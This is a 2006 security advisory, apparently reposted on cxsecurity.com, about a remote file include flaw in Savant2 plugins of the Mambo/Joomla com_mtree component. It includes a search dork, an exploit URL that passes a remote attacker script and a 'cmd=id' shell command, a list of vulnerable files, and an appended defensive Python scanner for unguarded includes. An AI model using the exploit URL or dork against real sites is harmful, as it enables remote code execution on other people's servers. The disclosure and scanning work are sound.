Savant2 Remote File Include Vulnerability [For Mambo, Joomla]

2006.08.08
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

>>> Kurdish Security
>>> Savant2 Remote File Include Vulnerability
>>> Freedom For Ocalan
>>> Contact : irc.gigachat.net #kurdhac % www.PatrioticHackers.com
>>> Risk : High
>>> Class : Remote
>>> Script : Savant2
>>> Site : www.phpsavant.com
>>> Thanx : kurdishsniper,netqurd,flot,azad,darki,B3g0k,jubni,milex,fearless,kha,kca and other my friends

d0rkiz : "com_mtree"

----------------------------------------------------------------------------------

/**
* Base plugin class.
*/
global $mosConfig_absolute_path;
require_once $mosConfig_absolute_path.'/components/com_mtree/Savant2/Plugin.php';

/**

For mambo and joomla

http://www.site.com/[mam_jom_path]/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=EvilScript.txt?&cmd=id

used link :]

Savant2_Compiler_basic.php
Savant2_Error_pear.php
Savant2_Error_stack.php
Savant2_Filter_colorizeCode.php
Savant2_Filter_trimwhitespace.php
Savant2_Plugin_ahref.php
Savant2_Plugin_ahrefcontact.php
Savant2_Plugin_ahreflisting.php
Savant2_Plugin_ahreflistingimage.php
Savant2_Plugin_ahrefmap.php
Savant2_Plugin_ahrefownerlisting.php
Savant2_Plugin_ahrefprint.php
Savant2_Plugin_ahrefrating.php
Savant2_Plugin_ahrefrecommend.php
Savant2_Plugin_ahrefreport.php
Savant2_Plugin_ahrefreview.php
Savant2_Plugin_ahrefvisit.php
Savant2_Plugin_checkbox.php
Savant2_Plugin_cycle.php
Savant2_Plugin_dateformat.php
Savant2_Plugin_editor.php
Savant2_Plugin_form.php
Savant2_Plugin_image.php
Savant2_Plugin_input.php
Savant2_Plugin_javascript.php
Savant2_Plugin_listalpha.php
Savant2_Plugin_listingname.php
Savant2_Plugin_modify.php
Savant2_Plugin_mtpath.php
Savant2_Plugin_options.php
Savant2_Plugin_radios.php
Savant2_Plugin_rating.php
Savant2_Plugin_stylesheet.php
Savant2_Plugin_textarea.php
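An added example (not part of the advisory and not code from the Savant2 project): a Python audit script that flags PHP files where an include is built from `$mosConfig_absolute_path`, as in the snippet quoted above, with no direct-access guard before it. Treating `defined('_VALID_MOS')` / `defined('_JEXEC')` as the fix is an assumption, since the advisory names no patch; the function names are illustrative.

```python
import re
from pathlib import Path

# include/require whose path starts with the global named in the advisory
INCLUDE_RE = re.compile(
    r"\b(?:require|include)(?:_once)?\b\s*\(?\s*\$mosConfig_absolute_path\b")
# Assumed fix: the CMS direct-access guard (_VALID_MOS in Mambo/Joomla 1.0,
# _JEXEC in Joomla 1.5+); the advisory itself does not describe a fix
GUARD_RE = re.compile(
    r"defined\s*\(\s*['\"](?:_VALID_MOS|_JEXEC)['\"]\s*\)\s*(?:or|\|\|)\s*(?:die|exit)\b")
# Heuristic comment matcher; it does not parse PHP string literals
COMMENT_RE = re.compile(r"/\*.*?\*/|//[^\n]*|#[^\n]*", re.S)

def unguarded_includes(php_source):
    """Return 1-based line numbers of includes built from
    $mosConfig_absolute_path that no direct-access guard precedes."""
    # Blank out comments but keep newlines so line numbers stay correct
    code = COMMENT_RE.sub(lambda m: re.sub(r"[^\n]", " ", m.group()), php_source)
    guard = GUARD_RE.search(code)
    guard_pos = guard.start() if guard else len(code)
    return [code.count("\n", 0, m.start()) + 1
            for m in INCLUDE_RE.finditer(code) if m.start() < guard_pos]

def scan_tree(root):
    """Map each .php file under root to its unguarded include lines."""
    findings = {}
    for path in sorted(Path(root).rglob("*.php")):
        lines = unguarded_includes(path.read_text(errors="replace"))
        if lines:
            findings[str(path)] = lines
    return findings

# Constructed samples: the first repeats the snippet quoted in the advisory,
# the second adds the guard (assumed fix, not taken from the advisory).
VULNERABLE = """<?php
/**
* Base plugin class.
*/
global $mosConfig_absolute_path;
require_once $mosConfig_absolute_path.'/components/com_mtree/Savant2/Plugin.php';
"""
GUARDED = """<?php
defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');
global $mosConfig_absolute_path;
require_once $mosConfig_absolute_path.'/components/com_mtree/Savant2/Plugin.php';
"""

if __name__ == "__main__":
    print(unguarded_includes(VULNERABLE), unguarded_includes(GUARDED))
```

Pointing `scan_tree()` at a site's `components/com_mtree/Savant2/` directory lists which of the files named above still lack the guard.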



Copyright 2021, cxsecurity.com

 
